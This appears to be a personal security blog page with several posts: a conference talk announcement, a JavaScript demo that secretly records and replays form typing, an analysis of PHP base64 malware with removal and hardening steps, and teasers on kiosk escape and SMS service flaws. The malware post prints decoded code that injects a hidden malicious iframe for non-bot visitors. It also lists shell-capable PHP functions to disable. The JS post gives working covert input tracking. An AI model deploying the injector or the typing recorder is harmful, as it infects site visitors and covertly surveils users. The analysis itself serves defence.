Why you should go to Newline 2013

What’s Newline?

Well, it’s a free conference in Whitespace, the hackerspace in Ghent. If you’re not from around here, there’s a room available for sleeping on your own mattress and sleeping bag on Friday and Saturday night.

I can’t speak for the others, but I’m pretty sure they will be giving some awesome talks :D.

But I can tell you this about my talks: you probably noticed I like talking about security. Well, both my talks will be about something new, and I won’t publish the slides.
So if you want to hear some new stuff, just be there!

What will I be talking about?

1. Rogue Colocation of SMS gateways and tor boxes
Anonymity means a lot to some people.
I’ll explain how you can set up, maintain and protect a Tor box or SMS gateway in a “public” environment.

2. You shouldn’t: Ticket “free” transportation
I’ll explain some flaws in both the public transport sector and the parking tickets.*

Links

The website
Facebook event
Google+ event

Schedule

*This does not include a demo for legal reasons.


Spyjax 2.0: Input history

When you’re typing some text you’ll always make some kind of mistake.
Or maybe you’ll copy-paste something and then replace a few words. Maybe it’s not your text, but you can replace some of the references and make it yours; nobody knows, right?

Or do they…

Using JavaScript we can record everything the user typed 😛
I’ve mentioned this in a previous post.

I’ve made a quick demo: http://ict-blue.be/qwaxys/projects/replay/.

When you hit submit on the demo, you’ll see the result. In reality you won’t. I would just use the last text as what I need (a comment, review, solicitation?) and store the complete history in a database.

Then any time I want (or somebody else, perhaps a future employer...) it’s just a matter of replaying that data.

Just imagine the possibilities…
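As an added example (mine, not the code behind the demo linked above), here is the recording and replay logic in plain JavaScript, run against a constructed editing history so it executes outside a browser. The names recordSnapshot, replay, leakedWords and attachRecorder are this example’s own. The function leakedWords makes the privacy point concrete: it lists the words that appeared in some draft but not in the text the user finally submitted, which is exactly the part of the history the user believes was deleted.

```javascript
// Added example: input-history recording and replay, as a privacy illustration.
// Function names (recordSnapshot, replay, leakedWords, attachRecorder) are this example's own.

// Append the field's current value to the history, skipping exact repeats.
// In a browser this is called from an 'input' listener on the text field.
function recordSnapshot(history, value, t) {
  const last = history[history.length - 1];
  if (!last || last.value !== value) history.push({ t, value });
  return history;
}

// Return the drafts in order: what a "replay" of the stored history shows.
function replay(history) {
  return history.map(s => s.value);
}

// Lower-cased word tokens of a draft.
function tokens(text) {
  return text.toLowerCase().match(/[a-z0-9']+/g) || [];
}

// Words present in some earlier draft but absent from the final submission:
// the part of the history the user believes was deleted, which the site keeps.
function leakedWords(history) {
  if (history.length === 0) return [];
  const kept = new Set(tokens(history[history.length - 1].value));
  const leaked = new Set();
  for (const snap of history) {
    for (const w of tokens(snap.value)) if (!kept.has(w)) leaked.add(w);
  }
  return [...leaked].sort();
}

// Browser wiring, for completeness; only meaningful where a DOM exists.
function attachRecorder(field, history) {
  field.addEventListener('input', () => recordSnapshot(history, field.value, Date.now()));
}

// Constructed sample history: a review drafted, pasted over and edited.
const SAMPLE_EDITS = [
  [0, ''],
  [1200, 'Terrible service, manager Dave was rude'],
  [5400, 'Great service, manager Dave was helpful'],
  [7900, 'Great service, staff was helpful'],
];

function sampleHistory() {
  const history = [];
  for (const [t, value] of SAMPLE_EDITS) recordSnapshot(history, value, t);
  return history;
}

const h = sampleHistory();
console.log('submitted:', replay(h)[h.length - 1]);
console.log('replay:', replay(h));
console.log('leaked words:', leakedWords(h));
```

Only the last snapshot ever reaches the page the user sees; everything before it is what a stored history gives away.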


PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 
    eval(base64_decode($script));
    @eval(gzinflate(base64_decode($virusaworm)));
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>
        </div>';
}

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.

How do we get rid of it?

In your webroot, put a .htaccess file with the following content:
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php locally (from 127.0.0.1, the only address the .htaccess above lets through).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need; for example, some template systems use eval(). Note that eval is a language construct rather than a function, so listing it in disable_functions does not actually block it; restricting what may run inside eval() is what the Suhosin step below is for.

Change your file permissions!

Install and configure Suhosin. It lets you whitelist the functions allowed inside eval(), so that functions like base64_decode can never execute there.
In that case, even if some bot manages to upload the payload, it cannot execute correctly.


Interesting reading

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/


You shouldn’t: minimize a fullscreen application on a public computer.

What is it?

Sticky Keys, the feature that turns a keyboard into a soundboard when you press shift 5 times.

Of course this is an accessibility feature to help computer users who have physical disabilities,
but let’s analyse those keys in the context of a fullscreen application, for example a kiosk browser.

Read the rest of this entry »


You shouldn’t: free sms, random identity theft and sms DoS attack

Interesting title, right? Well, let’s start from the beginning. I love free services and I don’t mind if they come with advertisements if it’s worth it. What I don’t like is yet another free service quickly made with as much care for security as a chain smoker on the Hindenburg Zeppelin.

I sent them an e-mail on 7 December 2011 and they haven’t replied. So I did warn them.

Now the fun part!

Read the rest of this entry »